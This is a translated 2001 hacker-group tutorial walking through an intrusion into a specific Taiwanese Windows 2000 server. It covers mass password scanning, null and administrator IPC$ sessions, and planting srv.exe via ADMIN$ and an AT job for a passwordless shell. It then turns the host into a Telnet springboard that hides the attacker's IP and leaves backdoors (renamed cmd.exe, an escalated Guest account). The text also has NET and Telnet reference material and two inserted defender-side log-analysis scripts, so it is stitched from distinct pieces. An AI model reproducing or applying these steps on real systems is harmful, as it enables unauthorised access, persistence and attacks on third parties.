NT simple invasion tutorial
2001-04-18 21:49:03
"China Honker Network Security Technology Alliance" http://www.cnhonker.com
Honker Union of China: "NT Simple Invasion"
------------------

Today we look at the process of intruding a Taiwanese NT host.

Tools: download from Xiaorong's site, http://www.netxeyes.com. It is recommended that you have NT 4.0 or Windows 2000 yourself, so that the software and the commands below work properly. Under the Fluxay (流光) 2000 installation directory there are the IPCHowTo and Tools directories, which both contain tutorials and tools. You can read his tutorial as well, but I found that the solution given there is not the best, so let me describe my own intrusion steps here. :)

Some people may not know what an IPC connection is. IPC originally means inter-process communication on UNIX. What we are talking about here is IPC under Windows, which is mainly the named-pipe resource IPC$; programs use it when you remotely manage a computer or view its shared resources, and under Windows it is driven with the NET command. In scan reports we often see the words "null connection", and many people do not know what that is. It is simply an IPC connection made with no password and no user name:

    NET USE \\IP\IPC$ "" /user:""

Below is the basic usage of the NET command. It merges the explanations of the NET command for Windows 98, Windows NT Workstation and Windows NT Server, and I hope it is fairly complete. First some general points:

(1) NET is a command-line command.
(2) It manages the network environment, services, users, logins and other local information.
(3) Windows 98, NT Workstation and NT Server all have a NET command.
(4) The NET command of Windows 98 differs from that of Workstation and NT Server.
(5) The NET command of Workstation and Server is basically the same.
(6) Getting help: (a) graphically in NT, via Help - Index - type NET; (b) at the command line, NET /?, NET alone, or NET HELP list the sub-commands, and NET COMMAND /HELP, NET HELP COMMAND or NET COMMAND /? give help for one sub-command. NET HELPMSG message# explains a four-digit message number.
(7) Forced parameters: all NET commands accept /YES and /NO (abbreviated /Y and /N). [Simply put, you answer the system's questions in advance.]
(8) Some commands produce settings that are saved permanently; when using them, look for the graphical tool that matches that NET function.
(10) Composition of a command: command parameter option parameter option ...
Some parameters of the NET command cannot be used from a DOS window under Windows; they can only be used in plain DOS.

Basic usage of the individual sub-commands of the NET command:

(1) NET VIEW: displays the domain list, the list of computers, or the shared resources of a specified computer.
Command format: NET VIEW [\\computername | /DOMAIN[:domainname]]
Parameters:
(1) NET VIEW without parameters displays the computer list of the current domain.
(2) \\computername specifies the computer whose shared resources you want to view.
(3) /DOMAIN[:domainname] specifies the domain whose available computers you want to view.
Examples:
(1) NET VIEW \\YFANG  -- view the shared resource list of YFANG.
(2) NET VIEW /DOMAIN:LOVE  -- view the list of machines in the LOVE domain.

(2) NET USER: adds or changes user accounts, or displays user account information. This command can also be written NET USERS.
Command format: NET USER [username [password | *] [options]] [/DOMAIN]
Parameters:
(1) NET USER without parameters shows the list of user accounts on the computer.
(2) username: the name of the user account to add, delete, change or view.
(3) password: assigns or changes the password of the user account.
(4) *: prompts for the password.
(5) /DOMAIN performs the operation on the primary domain controller of the computer's primary domain.
Example:
(1) NET USER yfang  -- view the information of user yfang.

(3) NET USE: connects the computer to a shared resource or disconnects it, or displays the computer's connection information.
Command format: NET USE [devicename | *] [\\computername\sharename[\volume]] [password | *] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]]
Parameters:
NET USE without parameters lists the network connections.
devicename: the name of the resource to connect, or the device name to disconnect.
\\computername\sharename: the server and the name of the shared resource.
password: the password for accessing the shared resource.
*: prompts for the password.
/USER specifies a different user for the connection.
domainname specifies another domain.
username specifies the user name to log on with.
/HOME connects the user to their home directory.
/DELETE cancels the specified network connection.
/PERSISTENT controls whether network connections are made permanent.
Examples:
(1) NET USE E: \\YFANG\TEMP  -- map the \\YFANG\TEMP directory as drive E:.
(2) NET USE E: \\YFANG\TEMP /DELETE  -- disconnect it.

(4) NET TIME: synchronizes the computer's clock with that of another computer or domain.
Command format: NET TIME [\\computername | /DOMAIN[:name]] [/SET]
Parameters:
(1) \\computername: the server whose time to check or synchronize with.
(2) /DOMAIN[:name] specifies the domain whose time to synchronize with.
(3) /SET synchronizes the computer's clock with the clock of the specified computer or domain.

The following four sub-commands are related, so they are introduced together:
(5) NET START: starts a service, or displays the list of started services.
Command format: NET START service
(6) NET PAUSE: pauses a running service.
Command format: NET PAUSE service
(7) NET CONTINUE: reactivates a paused service.
Command format: NET CONTINUE service
(8) NET STOP: stops a Windows NT network service.
Command format: NET STOP service
Let's look at what these services are:
(1) Alerter
(2) Client Service for NetWare
(3) ClipBook Server
(4) Computer Browser
(5) Directory Replicator
(6) FTP Publishing Service
(7) LPDSVC
(8) Net Logon
(9) Network DDE
(10) Network DDE DSDM
(11) Network Monitor Agent
(12) NT LM Security Support Provider
(13) OLE (Object Linking and Embedding)
(14) Remote Access Connection Manager
(15) Remote Access ISNSAP Service
(16) Remote Access Server
(17) Remote Procedure Call (RPC) Locator
(18) Remote Procedure Call (RPC) Service
(19) Schedule
(20) Server
(21) Simple TCP/IP Services
(22) SNMP
(23) Spooler
(24) TCP/IP NetBIOS Helper
(25) UPS
(26) Workstation
(27) Messenger
(28) DHCP Client
(29) EventLog
The following services are only available on NT Server:
(1) File Server for Macintosh
(2) Gateway Service for NetWare
(3) Microsoft DHCP Server
(4) Print Server for Macintosh
(5) RemoteBoot
(6) Windows Internet Name Service

(9) NET STATISTICS: displays the statistics log of the local Workstation or Server service.
Command format: NET STATISTICS [WORKSTATION | SERVER]
Parameters:
(1) NET STATISTICS without parameters lists the running services for which statistics are available.
(2) WORKSTATION displays the statistics of the local Workstation service.
(3) SERVER displays the statistics of the local Server service.
Example:
(1) NET STATISTICS SERVER | MORE  -- display the Server service statistics page by page.

(10) NET SHARE: creates, deletes or displays shared resources.
Command format: NET SHARE sharename=drive:path [/USERS:number | /UNLIMITED] [/REMARK:"text"]
Parameters:
(1) NET SHARE without parameters displays information about all shared resources on the local computer.
(2) sharename is the network name of the shared resource.
(3) drive:path specifies the absolute path of the shared directory.
(4) /USERS:number sets the maximum number of users that may access the shared resource at the same time.
(5) /UNLIMITED does not limit the number of users accessing the shared resource at the same time.
(6) /REMARK:"text" adds a comment to the resource; the text is enclosed in quotation marks.
Examples:
(1) NET SHARE mylove=C:\temp /REMARK:"my first share"  -- share C:\temp.
(2) NET SHARE mylove /DELETE  -- stop sharing the mylove directory.

(11) NET SESSION: lists or disconnects the sessions between the local computer and the clients connected to it. It can also be written NET SESSIONS or NET SESS.
Command format: NET SESSION [\\computername] [/DELETE]
Parameters:
(1) NET SESSION without parameters shows all sessions of the local computer.
(2) \\computername identifies the computer whose session is to be listed or disconnected.
(3) /DELETE ends the session with \\computername and closes all files the computer opened during that session.

(12) NET SEND: sends a message to other users, computers or messaging names on the network.
Command format: NET SEND {name | * | /DOMAIN[:name] | /USERS} message
Parameters:
(1) name: the user name, computer name or messaging name to receive the message.
(2) *: sends the message to all names in the group.
(3) /DOMAIN[:name] sends the message to all names in the computer's domain.
(4) /USERS sends the message to all users connected to the server.
(5) message: the text sent as the message.
Example:
(1) NET SEND /USERS Server will shutdown in 5 minutes.  -- send the message to the users.

(13) NET PRINT: displays or controls print jobs and print queues.
Command format: NET PRINT [\\computername] job# [/HOLD | /RELEASE | /DELETE]
Parameters:
(1) computername: the name of the computer sharing the printer queue.
(2) sharename: the name of the print queue.
(3) job#: the identification number assigned to the print job in the printer queue.
(4) /HOLD, used with job#, makes the job wait in the printer queue.
(5) /RELEASE releases a held print job.
(6) /DELETE removes the print job from the printer queue.
Example:
(1) NET PRINT \\YFANG\SEEME  -- list the contents of the SEEME printer queue on the \\YFANG machine.

(14) NET NAME: adds or deletes a messaging name (sometimes called an alias), or displays the list of names for which the computer receives messages.
Command format: NET NAME [name [/ADD | /DELETE]]
Parameters:
(1) NET NAME without parameters lists the names currently in use.
(2) name specifies the name that receives messages.
(3) /ADD adds the name to the computer.
(4) /DELETE removes the name from the computer.

(15) NET LOCALGROUP: adds, displays or changes local groups.
Command format: NET LOCALGROUP groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
Parameters:
(1) NET LOCALGROUP without parameters displays the server name and the computer's local group names.
(2) groupname: the local group to add, expand or delete.
(3) /COMMENT:"text" adds a comment to a new or existing group.
(4) /DOMAIN performs the operation on the primary domain controller of the current domain; otherwise it is performed on the local computer only.
(5) name [...] lists one or more user names or group names to add to or remove from the local group.
(6) /ADD adds the global group name or user name to the local group.
(7) /DELETE removes a group name or user name from the local group.
Examples:
(1) NET LOCALGROUP love /ADD  -- add a local group named LOVE to the local user account database.
(2) NET LOCALGROUP love  -- display the users in the local group.

(16) NET GROUP: adds, displays or changes global groups in a Windows NT Server domain.
Command format: NET GROUP groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
Parameters:
(1) NET GROUP without parameters displays the server name and the server's group names.
(2) groupname: the group to add, expand or delete.
(3) /COMMENT:"text" adds a comment to a new or existing group.
(4) /DOMAIN performs the operation on the primary domain controller of the current domain; otherwise it is performed on the local computer.
(5) username [...] lists one or more users to add to or remove from the group.
(6) /ADD adds the group, or adds the user name to the group.
(7) /DELETE deletes the group, or removes the user name from the group.
Example:
(1) NET GROUP love yfang1 yfang2 /ADD  -- add the existing user accounts YFANG1 and YFANG2 to the LOVE group.

(17) NET FILE: displays the names of all open shared files on a server and the record locks on them.
Command format: NET FILE [id [/CLOSE]]
Parameters:
(1) NET FILE without parameters lists the files open on the server.
(2) id: the identification number of the file.
(3) /CLOSE closes the open file and releases the lock records.

(18) NET CONFIG: displays the configurable services that are running, or displays and changes the settings of a service.
Command format: NET CONFIG [service [options]]
Parameters:
(1) NET CONFIG without parameters displays the list of configurable services.
(2) service: the service to configure with the NET CONFIG command (SERVER or WORKSTATION).
(3) options: options specific to the service.

(19) NET COMPUTER: adds a computer to, or deletes it from, the domain database.
Command format: NET COMPUTER \\computername {/ADD | /DEL}
Parameters:
(1) \\computername specifies the computer to add to or delete from the domain.
(2) /ADD adds the specified computer to the domain.
(3) /DEL deletes the specified computer from the domain.
Example:
(1) NET COMPUTER \\CC /ADD  -- add computer CC to the logon domain.

(20) NET ACCOUNTS: updates the user account database and changes the password and logon requirements for all accounts.
Command format: NET ACCOUNTS [/FORCELOGOFF:{minutes | NO}] [/MINPWLEN:length] [/MAXPWAGE:{days | UNLIMITED}] [/MINPWAGE:days] [/UNIQUEPW:number] [/DOMAIN]
Parameters:
(1) NET ACCOUNTS without parameters displays the current password settings, logon time limits and domain information.
(2) /FORCELOGOFF:{minutes | NO} sets the number of minutes to wait before forcing a user off when the user account or the valid logon hours expire.
(3) /MINPWLEN:length sets the minimum number of characters of a password.
(4) /MAXPWAGE:{days | UNLIMITED} sets the maximum number of days a user account password is valid.
(5) /MINPWAGE:days sets the minimum number of days a user must keep a password.
(6) /UNIQUEPW:number requires that when a user changes the password, the same password may only be reused after number changes.
(7) /DOMAIN performs the operation on the primary domain controller of the current domain.
(8) /SYNC, when used on the primary domain controller, synchronizes all backup domain controllers in the domain.
Example:
(1) NET ACCOUNTS /MINPWLEN:7  -- set the minimum number of characters of user account passwords to 7.

------------------------------------------------------------------------------------------------
The above is the basic usage of the NET command under Windows NT.
------------------------------------------------------------------------------------------------

Now let's look at the basic usage of the NET command under Windows 98. Some sub-commands have the same name, function and usage as under Windows NT:
(1) NET TIME
(2) NET PRINT
(3) NET USE
(4) NET VIEW
Some Windows 98 sub-commands have the same name as under NT, but their usage is a bit different:
(1) NET START: starts the corresponding service (cannot be used in a DOS window under Windows).
Command format: NET START [BASIC | NWLINK] [/LIST] [/YES] [/VERBOSE]
(2) NET STOP: stops the corresponding service (cannot be used in a DOS window under Windows).
Command format: NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES]
And some sub-commands exist only in the Windows 98 NET command.
They are:
(1) NET DIAG: runs the Microsoft Network Diagnostics program to display network diagnostic information.
Command format: NET DIAGNOSTICS [/NAMES | /STATUS]
(2) NET INIT: loads protocol or network adapter drivers without binding them (cannot be used in a DOS window under Windows).
Command format: NET INITIALIZE [/DYNAMIC]
(3) NET LOGOFF: disconnects from shared resources (cannot be used in a DOS window under Windows).
(4) NET LOGON: logs on to a workgroup (cannot be used in a DOS window under Windows).
Command format: NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO]
(5) NET PASSWORD: changes your network logon password (cannot be used in a DOS window under Windows).
Command format: NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword [newpassword]]]

At the same time, we should also know something about Telnet.

Remote login (Telnet)

I. About remote login

Remote login is an incredible tool: it lets you use a remote computer system across time and space. With remote connections, sharing computer hardware and software resources becomes very efficient. As a metaphor, you can connect to a supercomputer located somewhere (assuming you have access to it) and run a heavy simulation; when the results come out, you can transfer the data to a graphics workstation, which produces a rendered image. In this example you have used a supercomputer and a graphics workstation, while the machine your hands actually touched is probably a personal computer (PC) in the laboratory, and the other two computers may be somewhere you do not even know! Indeed, you do not need to know: through the Internet's remote login tools you only need to know where the CPU time and the application software you want are. Remote login applies across time and space, and of course also inside an office LAN, where one computer emulates a terminal of another computer and connects to it.

What is Telnet? You may have heard that Telnet is one of the communication protocols; for our purposes you can ignore that. Simply think of Telnet as a practical tool with one specific function: it is the tool we use to perform a remote login, letting one computer connect into another. As the author has mentioned many times, most applications on the network use the Client/Server model: one end is the requester, which runs the Telnet client program, and the host end runs a server program that accepts connection requests. In most cases a host has both the client and the server. A remote login is not very different from dialling in to a host over a telephone line or any other way: you must have a personal account on the other party's system and its password before you can connect to that host system. See the description below for details.

In addition, there are quite a variety of service systems on the Internet that provide their services this way, most of them free, like hytelnet, BBS, gopher and archie; such systems usually open a public account that does not need a password. Telnet's function is to emulate a terminal of the remote computer system and log in to it over the network connection. If you have a personal computer running DOS in your laboratory and it is connected to the campus network, you can ask someone to help you install NCSA Telnet, and then you can do the incredible things described above (the author is not exaggerating :-)). NCSA Telnet is a client program designed specifically for DOS; on a UNIX machine there is nothing to worry about, since telnet is already there.
II. Example: remote login to a host system

    $ telnet jet.ncic1.ac.cn          <- connect
    Trying 159.226.43.26 ...
    Connected to 159.226.43.26.
    Escape character is '^]'.

    SunOS UNIX (SPARC4)

    login: feng                        <- enter the account
    Password: ******                   <- enter the password
    Last login: Thu Dec 30 11:37:17 from 159.226.43.45
    SunOS Release 4.1.1 (SPARC15) #1: Tue Nov 12 05:15:31 CST 1996

The above is a typical remote login. A public service system offered by a remote host is used in the same way, as are many commercial service systems. On the Internet we can find many interesting service systems; for example, if you like chess you can find Go servers, on which you play against another person (note that the opponent is a "person", and you may not even know which corner of the world the opponent is in; wonderful!). Others, like online game systems (MUDs), you can try when you have time. Service systems such as BBS, IRC and Gopher can also be used through Telnet.

III. Telnet and TN3270

When using a remote login you only need to know a few Telnet commands: how to run your local commands (on your own host), how to end the connection, and how to interrupt a connection that cannot be ended normally. Telnet does not have many special commands of its own, unlike FTP. Whether in the DOS or the UNIX environment, Telnet is a very easy command that hardly needs any learning; you only need to know how to start the connection and how to log out when the other system requires it. Below the author introduces only two commands.

Telnet under DOS and under UNIX are almost the same. The differences come only from the system you connect to, so the procedure differs slightly and you have to pay attention to the other system's requirements for ending the connection. For example, when you use TN3270 to connect to an IBM VM system, "logoff" (case does not matter) is the command that ends the connection; unless you have to, do not end the connection with the UNIX "kill" command. Under UNIX you can press Ctrl-] (the Ctrl key and the ] key together; sometimes you need to press twice) to temporarily return to the telnet/tn3270 environment, where you can run telnet's/tn3270's own commands, as shown below.

    telnet> ?                  <- ? shows the help
    Commands may be abbreviated.  Commands are:

    close           close current connection
    display         display operating parameters
    mode            try to enter line-by-line or character-at-a-time mode
    open            connect to a site
    quit            exit telnet
    send            transmit special characters ('send ?' for more)
    set             set operating parameters ('set ?' for more)
    status          print status information
    toggle          toggle operating parameters ('toggle ?' for more)
    z               suspend telnet
    ?               print help information
    telnet> status             <- view the current connection state
    No connection.
    Escape character is '^]'.
    telnet> z                  <- temporarily return to the local shell, putting the connection in the background
    [1] + Stopped  telnet
    $ fg                       <- bring it back to the foreground (return to telnet)
    telnet> q                  <- break the connection (not recommended)
    $

To return from the telnet> prompt to the connection, just press Enter. The above also applies to TN3270, which the author will not explain separately. Finally, the author can only tell you that Telnet itself is very easy to operate and understand, which is why this section does not give many examples. What you really need to know is the system that telnet connects you to: telnet is just a bridge, and when you walk across a bridge you do not care which craftsmen built it or what materials they used.
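As an added, defender-side example that is not part of this tutorial: the null IPC$ connection described at the top of the page shows up on the server as a session with an empty user name in the output of NET SESSION (sub-command (11) above). The script below parses a constructed `net session` listing (the column layout is modelled on the NT/2000 output, and since real column widths may differ it takes the column positions from the header line) and reports sessions with no user name, which on a server that is not supposed to allow anonymous access deserve a look; Guest sessions are listed as a second, lower-priority finding.

```python
"""Flag null (anonymous) sessions in the output of NET SESSION.

Added defender-side example, not part of the original tutorial.  The
listing below is CONSTRUCTED to resemble `net session` output on an
NT/2000 server; the parser takes the column offsets from the header
line, so it also copes with a different column width on a real system.
"""


def _row(computer, user, client, opens, idle):
    """Build one constructed listing line with the header's column widths."""
    return f"{computer:<23}{user:<21}{client:<18}{opens:>5} {idle}"


HEADER = f"{'Computer':<23}{'User name':<21}{'Client Type':<18}Opens Idle time"

# Constructed sample: one named admin session, one session with NO user name
# (a null IPC$ connection), and one Guest session.  192.0.2.0/24 is TEST-NET.
SAMPLE_NET_SESSION = "\n".join([
    HEADER,
    "",
    "-" * 79,
    _row("\\\\192.0.2.10", "ADMINISTRATOR", "Windows 2000 2195", 1, "00:00:05"),
    _row("\\\\192.0.2.77", "", "Windows NT 1381", 0, "00:12:41"),
    _row("\\\\192.0.2.9", "GUEST", "Windows 2000 2195", 2, "00:00:30"),
    "The command completed successfully.",
])


def parse_sessions(text):
    """Return one dict per session line (the lines that start with \\\\)."""
    lines = text.splitlines()
    header = next(line for line in lines if line.startswith("Computer"))
    user_col = header.index("User name")
    client_col = header.index("Client Type")
    opens_col = header.index("Opens")
    sessions = []
    for line in lines:
        if not line.startswith("\\\\"):
            continue
        tail = line[opens_col:].split()
        sessions.append({
            "computer": line[:user_col].strip(),
            "user": line[user_col:client_col].strip(),
            "client": line[client_col:opens_col].strip(),
            "opens": int(tail[0]),
            "idle": tail[1],
        })
    return sessions


def null_sessions(text):
    """Computers holding a session with an empty user name (null IPC$ session)."""
    return [s["computer"] for s in parse_sessions(text) if s["user"] == ""]


def audit(text):
    """Human-readable findings: null sessions, then sessions using GUEST."""
    findings = []
    for s in parse_sessions(text):
        if s["user"] == "":
            findings.append(f"{s['computer']}: null session (no user name), idle {s['idle']}")
        elif s["user"].upper() == "GUEST":
            findings.append(f"{s['computer']}: session as GUEST with {s['opens']} open file(s)")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_NET_SESSION):
        print(finding)
```

On a real server the text fed to `parse_sessions` would be the captured output of `net session`; a null session found this way is the server-side counterpart of the `NET USE \\IP\IPC$ "" /user:""` probe, and `net session \\computer /delete` (sub-command (11)) ends it.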
Ok, let's get to the topic. :) Let's scan a foreign (here Taiwanese) NT machine. With Fluxay's simple IPC probe it is easy to find careless network administrators; for example, I scanned the Taiwan network for five hours and found 1822 passwords. If you do not know how to use Fluxay, read the help files in the IPCHowTo directory of Fluxay 2000; I will not repeat them here. You can also use the NT passwords that were published twice before; many of those hosts will not have changed, and that is also how the Taiwanese NT hosts here were found. :)

Now suppose we have successfully probed the password of the super administrator Administrator on the Taiwanese NT host 211.21.193.202. The Fluxay probe report shows something like:

    Server: 211.21.193.202
    UserName: Administrator (admin)  Password: [empty]  fatal vulnerability
    HTTP server type: Microsoft-IIS/5.0
    Start page title: ??

From "HTTP server type: Microsoft-IIS/5.0" we can tell it should be Windows 2000 with a web service installed; if it were Microsoft-IIS/4.0 or lower, the machine would be NT 4.0 or below. (It is recommended that everyone look for Windows 2000 for experiments, because Windows 2000 comes with a Telnet daemon, whereas NT needs one installed separately. We can easily turn Telnet into the springboard we need, which can be used to attack other network hosts while hiding your true IP address. Using an NT springboard has an advantage over a UNIX springboard: a UNIX springboard is harder to set up than an NT one, so we use this poor Windows 2000 to do things for us. Heh :)

Below are the steps for logging in remotely when the super administrator Administrator of 211.21.193.202 has an empty password. Note that it is best to have the super administrator's password, so that you have better execution permissions.

NT remote login syntax: NET USE \\IP\IPC$ ["password"] /user:"username"
Logout syntax: NET USE \\IP\IPC$ /DELETE

    net use \\211.21.193.202\IPC$ "" /user:"administrator"

If the command completes successfully, our remote login over IPC has succeeded.

After a successful login, copy a Telnet program over (srv.exe, in the Tools directory of Fluxay). This program opens port 99 on the NT host.

    copy e:\hker\srv.exe \\211.21.193.202\admin$

admin$ is a default hidden share of NT which corresponds to the System32 directory under the NT installation directory, usually C:\WINNT\System32. You can also use C$, D$ and so on, which stand for the C: and D: drives; they are all default shares of the system. Usually we copy the program into admin$, because there are many files there and it is not easy to notice, and there is no need to specify a directory when starting it. :) The host displays:

    e:\hker\srv.exe
    1 file(s) copied.

Our copy succeeded. (If you just want to deface him, then copy e:\hker\index.htm \\ip\c$\inetpub\wwwroot is enough, although the real path and start file of the host's home page may differ; you can use http://ip/i.ida to see the physical path. The default path is the one used in the command above. We do not want to deface here; we just use him to do things for us. :)

Next is the problem of how to start this program. NT has a Schedule service, and we use it to launch the program. First check the host's time, to decide when to start it:

    net time \\211.21.193.202

Display:

    Current time at \\211.21.193.202 is 2000/12/24 08:55
    The command completed successfully.

We can see the host's time is 2000/12/24 08:55. (One thing to note: if the two machines are in different time zones, the display above has a line showing the current time of the target host, and that is the time we go by. Also convert the displayed time to 24-hour format; for example the "08:55" above corresponds to 20:55 in 24-hour time, and that is the time we want. :)

The AT command format is: AT \\IP time program (this uses the target host's Schedule service). Here we run:

    at \\211.21.193.202 21:00 srv.exe

Display:

    Added a new job with job ID = 0

Our job has been added successfully. (If it says "The service has not been started", the other side has not started the Schedule service.
Since we are already Administrator, we can use NetSvc from Microsoft's NT Resource Kit (downloadable from Microsoft's site) to start the Schedule service remotely. NetSvc is in the Tools directory under the Fluxay 2000 installation directory. The remote start method is:

    netsvc \\211.21.193.202 schedule /start

Details are in the Fluxay tutorial. Then we use the AT command to launch the program.)

We can also do it like this: copy e:\honker\srv.exe to the IIS Scripts directory, C:\inetpub\scripts, and then start it from the browser: http://ip/scripts/srv.exe. But the permissions of an srv.exe started this way are not enough, so starting it with the AT command is still better. :)

Wait a few minutes and we can telnet:

    telnet 211.21.193.202 99

(srv.exe opens port 99. Here no password is needed and there is no log record, but srv.exe must be restarted each time before it can be used again.) We see:

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.

    C:\WINNT\System32>

We have logged in successfully. Now we want to make him a springboard, but first there is a file to upload. As to why this is done, Fluxay's help has a very detailed explanation for NT, so I will not repeat it; we just do it. :) First open a DOS window as before, then:

    copy e:\honker\ntlm.exe \\211.21.193.202\admin$

to copy the file, then return to the Telnet window and run the program we just uploaded. Here we type NTLM:

    C:\WINNT\System32>ntlm
    Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
    Done!
    C:\WINNT\System32>

That means we have succeeded. :) Then we use the NET command to stop and restart the Telnet service:

    C:\WINNT\System32>net stop telnet
    [garbled Traditional-Chinese output, referring to NET HELPMSG 3521]

The target is a Traditional-Chinese Windows 2000, so we cannot read the specific content, but it reports an error :) because the target host has not started the Telnet service.
If the target host has not started the Telnet service, the step of stopping it can be omitted; you can start the Telnet service directly. :) To start the Telnet service:

    C:\WINNT\System32>net start telnet
    [garbled Traditional-Chinese output]

Again this is a Traditional-Chinese Windows 2000, so we cannot read the specific content, but the command succeeds and the service starts. OK, the springboard is ready.

We can now telnet 211.21.193.202 to connect to the target host and use him as the springboard to telnet onward. :) You can try:

    telnet 211.21.193.202
    NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password
    Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
    Welcome to Microsoft Telnet Service
    Telnet Server Build 5.00.99201.1
    login: administrator   ===> (type the user account to log in with, here Administrator, then Enter)
    password:              ===> (type the password; here the administrator's password is empty, so just press Enter)
    *===============================================================
    [garbled Traditional-Chinese banner: ... microsoft telnet server ...]
    *===============================================================
    C:\>

Oh, we have succeeded. :) The springboard is truly ready and usable. (Fluxay's tutorial is not very good at one point about the springboard: it uses the netsvc command to stop and start Telnet, which is too much trouble. You can look at the original text in Xiaorong's tutorial: "In order to make the modification take effect, we need to restart the Telnet Server on the other host." The commands in his screenshot are netsvc \\203.183.8.99 telnet /stop to stop the Telnet service and netsvc \\203.183.8.99 telnet /start to start it. Just run NTLM directly in the telnet 211.21.193.202 99 session and then run net stop telnet and net start telnet. That is why I wrote this NT intrusion tutorial. Heh, whether you use my way or Xiaorong's is your choice. Hehe :)

Now we should leave a back door, such as putting srv.exe in c:\inetpub\scripts, so that if the administrator changes the password we can still access this machine through the browser next time. Although the permissions obtained this way are lower than with the method above, we can still do a lot of things. Note that it can only be an *.exe file. Here we do:

    C:\>copy C:\WINNT\System32\srv.exe c:\inetpub\scripts
    [garbled Traditional-Chinese output: 1 file copied]

cmd.exe can also be copied to C:\inetpub\scripts and renamed, for example to chat.exe :), which is another good way of regaining access. Specifically, look at which executable directories are in use and hide the files you want there under another name, so that they are not deleted when the administrator finds them. Remember that it can only be renamed to an *.exe file. Here we execute:

    C:\>copy C:\WINNT\System32\cmd.exe C:\inetpub\scripts\chat.exe
    [garbled Traditional-Chinese output: 1 file copied]

Copy succeeded. You can copy to other executable directories to increase concealment. Of course, activating the Guest account of the target machine and adding it to the Administrators group is best. Below we continue by leaving a Guest user behind.
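As an added, defender-side example that is not part of this tutorial: every step of the walkthrough above leaves a trace on the host, and it is the sequence, not any single step, that distinguishes it from routine administration. The script below correlates constructed records of those traces per client address: a network logon, followed within a short window by a file written into ADMIN$ (System32) or the IIS Scripts directory, an AT job being added, and the Telnet or Schedule service being started. The tutorial shows no log format, so the `Event` records are a constructed simplification; in practice they would be filled from the Security and System event logs and from file-system auditing. Sessions with no account name (the scanner's null IPC$ probe) are reported separately.

```python
"""Correlate the host-side traces of the walkthrough above.

Added defender-side example, not part of the original tutorial.  The
records are CONSTRUCTED in a simplified form (the tutorial shows no log
format); on a real system each `Event` would be filled from the Security
and System event logs and from file-system auditing.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    when: datetime
    source: str   # client address the action came from
    kind: str     # "logon", "file_write", "at_job" or "service_start"
    detail: str   # account name, file path, job text or service name


# Directories the walkthrough writes into (ADMIN$ = System32, IIS Scripts,
# the web root) and the services it (re)starts.
SENSITIVE_DIRS = ("\\winnt\\system32", "\\inetpub\\scripts", "\\inetpub\\wwwroot")
SENSITIVE_SERVICES = ("telnet", "schedule")


def stage_of(ev):
    """Map one event to a stage of the chain, or None if it is not one."""
    d = ev.detail.lower()
    if ev.kind == "file_write" and any(s in d for s in SENSITIVE_DIRS):
        return "drop_into_admin_share"
    if ev.kind == "at_job":
        return "at_job_added"
    if ev.kind == "service_start" and d in SENSITIVE_SERVICES:
        return "service_started"
    return None


def null_session_sources(events):
    """Clients that opened a session with no account (the null IPC$ probe)."""
    return sorted({e.source for e in events
                   if e.kind == "logon" and e.detail.lower() in ("", "anonymous logon")})


def correlate(events, window_minutes=60, min_stages=2):
    """Return {source: [stages]} for clients whose logon is followed, within
    window_minutes, by at least min_stages different stages of the chain."""
    window = timedelta(minutes=window_minutes)
    by_source = {}
    for ev in sorted(events, key=lambda e: e.when):
        by_source.setdefault(ev.source, []).append(ev)
    alerts = {}
    for src, evs in by_source.items():
        for i, start in enumerate(evs):
            if start.kind != "logon":
                continue
            stages = set()
            for ev in evs[i + 1:]:
                if ev.when - start.when > window:
                    break
                stage = stage_of(ev)
                if stage:
                    stages.add(stage)
            if len(stages) >= min_stages:
                alerts[src] = sorted(stages)
    return alerts


# Constructed records (192.0.2.0/24 is TEST-NET).  192.0.2.10 follows the
# walkthrough; 192.0.2.55 is an operator who logs on and edits one file under
# System32, which on its own is normal administration.
EVENTS = [
    Event(datetime(2000, 12, 24, 8, 40), "192.0.2.10", "logon", "anonymous logon"),
    Event(datetime(2000, 12, 24, 8, 50), "192.0.2.10", "logon", "administrator"),
    Event(datetime(2000, 12, 24, 8, 52), "192.0.2.10", "file_write", "C:\\WINNT\\System32\\srv.exe"),
    Event(datetime(2000, 12, 24, 8, 56), "192.0.2.10", "at_job", "job 0: 21:00 srv.exe"),
    Event(datetime(2000, 12, 24, 9, 5), "192.0.2.10", "service_start", "telnet"),
    Event(datetime(2000, 12, 24, 9, 0), "192.0.2.55", "logon", "backupop"),
    Event(datetime(2000, 12, 24, 9, 2), "192.0.2.55", "file_write", "C:\\WINNT\\System32\\drivers\\etc\\hosts"),
]

if __name__ == "__main__":
    print("null sessions from:", null_session_sources(EVENTS))
    for src, stages in correlate(EVENTS).items():
        print(f"ALERT {src}: {', '.join(stages)}")
```

The threshold of two stages after a logon is deliberately low because each stage alone (a file copied into System32, an AT job, a service restart) is something an administrator does; the window keeps a week of unrelated maintenance from adding up to an alert, and shrinking it to a few minutes shows how the same records stop correlating.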